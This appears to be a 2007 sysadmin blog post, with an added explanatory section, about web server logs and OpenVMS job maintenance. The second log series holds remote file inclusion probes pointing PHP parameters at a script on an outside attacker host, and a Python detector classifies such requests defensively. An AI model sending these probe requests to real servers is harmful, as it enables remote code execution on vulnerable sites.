More attempts by HTTP

If it weren’t a nuisance to other systems, I could laugh out loud at the thought that you could bring the server down simply by accessing default locations, as if this were a standard Windows or Linux system. Take last week’s server log for the public web:
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:21 +0100] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /ads/adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /drupal/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /community/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blogs/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:24 +0100] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 868

He tried it again some time later, from the same address and, at first glance, with the same script, and of course with the same outcome: NOTHING.
The same applies to this attempt. I’m not sure, but it looks like a forum package to me:
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:42 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /index.php?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /live/help.php?css_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:43 +0100] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:44 +0100] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360

Yes, I do have MySQL and of course PHPMyAdmin, but what makes this guy think it would be on a publicly accessible site? That would be asking for trouble:
193.164.131.46 - - [25/Feb/2007:11:49:52 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /NoService.html HTTP/1.0" 200 2135
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /mysql/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /admin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /db/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /dbadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:54 +0100] "GET /web/phpMyAdmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/pma/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/phpmyadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /admin/mysql/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:55 +0100] "GET /phpmyadmin2/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /mysqladmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /mysql-admin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.2.3/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:57 +0100] "GET /myadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.0/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.0-pl1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.3-pl1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:58 +0100] "GET /phpMyAdmin-2.6.3/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:59 +0100] "GET /phpMyAdmin-2.6.3-rc1/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:59 +0100] "GET /phpMyAdmin-2.6.2-rc1/main.php HTTP/1.0" 302 341

I wonder what HIS system would look like. That would be an easy site to crack!
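The three series above are the same thing seen three times: a scanner walking a wordlist of default locations. The first and third are plain location scans (xmlrpc.php and phpMyAdmin's main.php under every directory name the tool knows), the second is a set of remote file inclusion probes: each request sets a script parameter to a URL on the attacker's host, so that a vulnerable PHP script would include() the remote file, and the trailing "?" in the payload turns whatever the script appends to the parameter into a harmless query string for that host. The following script is an added example, not code from the post; it parses Apache common-log lines like those above, classifies each request into one of those three probe families, and reports every source IP that hit several distinct probe paths inside a short window. The sample input is a handful of lines copied from the post plus two constructed ones (a benign request from 198.51.100.7 and a single probe from 198.51.100.8, which stays below the threshold); the threshold of three distinct paths in five minutes is an assumption chosen to fit those samples.

```python
"""Flag location scanners and RFI probes in an Apache common-log extract.

Added example, not code from the original post.  Three probe families from
the post's logs are recognised: "rfi" (a query value that is an external
URL for the target script to include()), "xmlrpc_scan" (xmlrpc.php /
adxmlrpc.php location scans) and "pma_scan" (phpMyAdmin main.php scans).
"""
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Directory names phpMyAdmin location scanners try (compared lower-case).
PMA_MARKERS = ("phpmyadmin", "/pma/", "myadmin", "mysql", "dbadmin")
URL_VALUE = re.compile(r"^(https?|ftp)://", re.I)


def parse_line(line):
    """Parse one common-log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    return rec


def classify(target):
    """Return the probe family for a request target, or None if it looks benign."""
    parts = urlsplit(target)          # path-only target: no scheme, no netloc
    path = parts.path.lower()
    # parse_qsl also yields array-style keys such as CONFIG_EXT[LANGUAGES_DIR]
    for _key, value in parse_qsl(parts.query, keep_blank_values=True):
        if URL_VALUE.match(value):
            return "rfi"
    basename = path.rsplit("/", 1)[-1]
    if basename in ("xmlrpc.php", "adxmlrpc.php"):
        return "xmlrpc_scan"
    if basename == "main.php" and any(mark in path for mark in PMA_MARKERS):
        return "pma_scan"
    return None


def find_scanners(lines, min_paths=3, window=timedelta(minutes=5)):
    """Return {ip: summary} for every source that probed at least `min_paths`
    distinct paths within `window`.  A client hammering one URL does not
    qualify; a location scanner walking a wordlist does."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        family = classify(rec["target"])
        if family:
            per_ip[rec["ip"]].append((rec["time"], family, urlsplit(rec["target"]).path))
    report = {}
    for ip, hits in per_ip.items():
        hits.sort()
        recent = deque()
        for when, _family, path in hits:
            recent.append((when, path))
            while when - recent[0][0] > window:   # drop hits outside the window
                recent.popleft()
            if len({p for _, p in recent}) >= min_paths:
                report[ip] = {
                    "hits": len(hits),
                    "families": dict(Counter(f for _, f, _ in hits)),
                    "first": hits[0][0],
                    "last": hits[-1][0],
                }
                break
    return report


# Sample input: lines copied from the post's logs plus two constructed lines
# (198.51.100.7 is a benign request, 198.51.100.8 a single probe below threshold).
SAMPLE_LOG = """\
69.13.158.140 - - [19/Feb/2007:13:29:20 +0100] "GET /adxmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:22 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
69.13.158.140 - - [19/Feb/2007:13:29:23 +0100] "GET /blog/xmlrpc.php HTTP/1.0" 404 868
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_simpleboard/image_upload.php?sbp=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:40 +0100] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 302 360
216.73.96.220 - - [23/Feb/2007:07:46:41 +0100] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?/ HTTP/1.1" 302 360
193.164.131.46 - - [25/Feb/2007:11:49:52 +0100] "GET /phpmyadmin/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /NoService.html HTTP/1.0" 200 2135
193.164.131.46 - - [25/Feb/2007:11:49:53 +0100] "GET /PMA/main.php HTTP/1.0" 302 341
193.164.131.46 - - [25/Feb/2007:11:49:56 +0100] "GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 302 341
198.51.100.7 - - [25/Feb/2007:12:00:00 +0100] "GET /index.html HTTP/1.1" 200 5123
198.51.100.8 - - [25/Feb/2007:12:01:00 +0100] "GET /xmlrpc.php HTTP/1.0" 404 868
""".splitlines()

if __name__ == "__main__":
    for ip, summary in sorted(find_scanners(SAMPLE_LOG).items()):
        print(f"{ip:16} {summary['hits']:3} probes  {summary['families']}")
```

The report is keyed on distinct paths rather than raw hit count so that a legitimate client retrying one URL is not mistaken for a scanner; the families are kept per IP so the output can be fed into a blocklist or a per-family alert. Note that the 302 results in the post's second and third series are the server's own redirect to its error page, as the /NoService.html line shows, not a sign that any of the targeted scripts exist.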

08-Mar-2007

Some maintenance on system management procedures needed to be done.

For some reason, the procedure that cycles the operator log and scans it for spam attempts hasn’t been working properly since the beginning of the week. That is: no operator log files have been copied to the operator web, and the spamlist hasn’t been updated. I just found that the cause was quite obvious: no new logfiles were being created. The log of the job does not show an error, but new files were not created, and the current one was last Monday’s.

I recall I had made slight changes last weekend, and the next run failed because the input file wasn’t found when the batch job started:
$ type scan_log.log.-2
Error opening primary input file SYS$INPUT
File not found
SYSTEM job terminated at 5-MAR-2007 00:00:00.10
$

so there was no job entry on the next day either.
I thought I hadn’t purged, but it seems I had. Well, no problem: submit it again, forgetting that it needs to be run as a user that has OPER privilege enabled by default. My standard account has OPER priv as an authorized privilege, not enabled by default. Hence, no REPLY. Weird that it didn’t show up in the log:
Starting new log.operator
$ define/user sys$command _opa0:   ! REPLY needs a terminal: point SYS$COMMAND at the console for the next command only
$ reply/enable                     ! enable this process as an operator (needs OPER privilege)
$ define/user sys$command _opa0:
$ reply/log                        ! new logfile
$ define/user sys$command _opa0:
$ reply/disable                    ! operator status no longer needed
$ wait 00:01                       ! wait a minute
$ set nover

OPERATOR.LOG does not signal this either – obviously:
%%%%%%%%%%% OPCOM 4-MAR-2007 23:26:50.87 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 216.148.221.135 Port: 28690

%%%%%%%%%%% OPCOM 4-MAR-2007 23:39:44.59 %%%%%%%%%%%
Logfile time stamp

%%%%%%%%%%% OPCOM 5-MAR-2007 00:39:44.60 %%%%%%%%%%%
Logfile time stamp

%%%%%%%%%%% OPCOM 5-MAR-2007 01:04:04.41 %%%%%%%%%%%
Message from user INTERnet on DIANA
INTERnet ACP SMTP Accept Request from Host: 156.153.255.213 Port: 33873

The problem is now solved – I hope. I ran the script – unaltered – with privs enabled, and the logfile has been cycled and scanned. So I altered the script to be sure it will be re-submitted under the right user now.
We’ll see tomorrow.
More typos
In the same log, it turns out that scanning for failed logins – at least, I suspect the problem to be there – has a typo as well. It does work, I saw the log has been updated, but I simply don’t like errors like this:
...
%BACKUP-S-CREATED, created WEB_DISK2:[private.ftp]tcpip$ftp_run.txt;77
%DCL-W-EXPSYN, invalid expression syntax - check operators and operands
Done
...

Tonight, it will run with verification enabled, so hopefully the error will show up in the log and I can do some repair. Luckily, this script is called by the daily log scanner and not submitted by itself, so any change will be effective immediately.
MySQL backup
doesn’t run well in batch either. The resulting SQL script ends:
/*!40000 ALTER TABLE `bbposts_text` DISABLE KEYS */;
LOCK TABLES `bbposts_text` WRITE;
%TYPE-F-WRITEERR, error writing SYS$OUTPUT:.;
-RMS-F-SYS, QIO system service request failed
-SYSTEM-F-EXQUOTA, process quota exceeded

Same problem as the log scanner: it doesn’t run under an account that is sufficiently privileged by default, so that has been changed as well, and the job re-submitted. Note that %SYSTEM-F-EXQUOTA is a process quota error rather than a privilege error: the output is written through RMS and QIO and runs out of a process quota (BYTLM or a similar buffered I/O limit), so what the other account brings is its larger quotas, and enabling privileges alone would not have fixed this one. One more to be checked tomorrow.